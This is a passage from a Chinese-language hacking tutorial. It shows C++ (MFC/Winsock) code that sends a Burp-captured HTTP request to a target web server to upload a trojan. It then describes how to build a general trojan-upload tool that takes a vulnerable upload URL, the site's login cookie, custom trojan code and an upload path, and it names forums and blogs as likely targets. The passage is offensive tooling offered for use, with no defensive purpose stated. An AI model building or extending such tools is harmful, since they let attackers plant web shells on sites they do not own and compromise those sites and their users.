上傳木馬的模塊可以通過直接發包達到上傳的效果，實現起來比較簡單，代碼如下：

　　void CuploadmumaDlg::OnBnClickedButton1（）

　　{

　　// TODO: 在此添加控件通知處理程序代碼

　　WSAData wsa = { 0 };

　　// 初始化

　　WSAStartup（MAKEWORD（2, 2）， &wsa）；

　　// 獲取 IP 地址

　　DWORD dwIPAddr = 0;

　　m_IpAddr.GetAddress（dwIPAddr）；

　　// 獲取端口號

　　WORD dwPort = 0;

　　dwPort = GetDlgItemInt（IDC_PORT）；

　　// 創建 SOCKET

　　SOCKET s = socket（PF_INET, SOCK_STREAM, IPPROTO_TCP）；

　　sockaddr_in sockaddr = { 0 };

　　sockaddr.sin_family = AF_INET;

　　sockaddr.sin_addr.S_un.S_addr = htonl（dwIPAddr）；

　　sockaddr.sin_port = htons（dwPort）；

　　// 連接服務器

　　int nRet = connect（s, （SOCKADDR*）&sockaddr, sizeof（SOCKADDR））；

　　// 獲取從 BURP 截取的 HTTP 的 request 包

　　char szText[2048] = { 0 };

　　GetDlgItemText（IDC_TEXT, szText, 2048）；

　　// 發送包

　　nRet = send（s, szText, lstrlen（szText）， 0）；

　　closesocket（s）；

　　WSACleanup（）；

　　}

　　代碼的流程比較簡單，主要就是完成了與Web服務器的連接，然后發送通過Burp截取的數據內容，程序界面如圖1所示。

　　圖1  發送木馬數據包上傳木馬

　　該木馬發送程序比較簡陋，只是簡單地提交了對Web服務器請求的數據包。開發一個較為通用的木馬上傳工具，就不能這么偷懶了。首先，需要提取出存在上傳漏洞的地址，因為每個系統存在上傳漏洞的地址是不相同的，因此漏洞的地址必須能夠接收用戶的輸入。接著提取HTTP請求頭部中的“Cookie”部分，因為上傳木馬時可能需要登錄系統以后才能進行上傳，但是為什么發包的時候可以，因為數據包中有COOKIE，因此必須要能讓用戶輸入“cookie”，因為一般的上傳漏洞可能是論壇、博客等系統，因此用戶可以自行登錄后，將cookie復制出來并粘貼到程序中。然后還有木馬的內容需要用戶自定義，那么程序界面上也需要留下輸入木馬的文本框，可以直接輸入木馬的代碼，也可以直接讓用戶輸入木馬的目錄，然后讓程序從文件中把木馬代碼讀出。有的上傳漏洞能夠讓用戶去控制上傳木馬后所在的目錄，那么還要給用戶一個可以設置上傳位置的輸入框。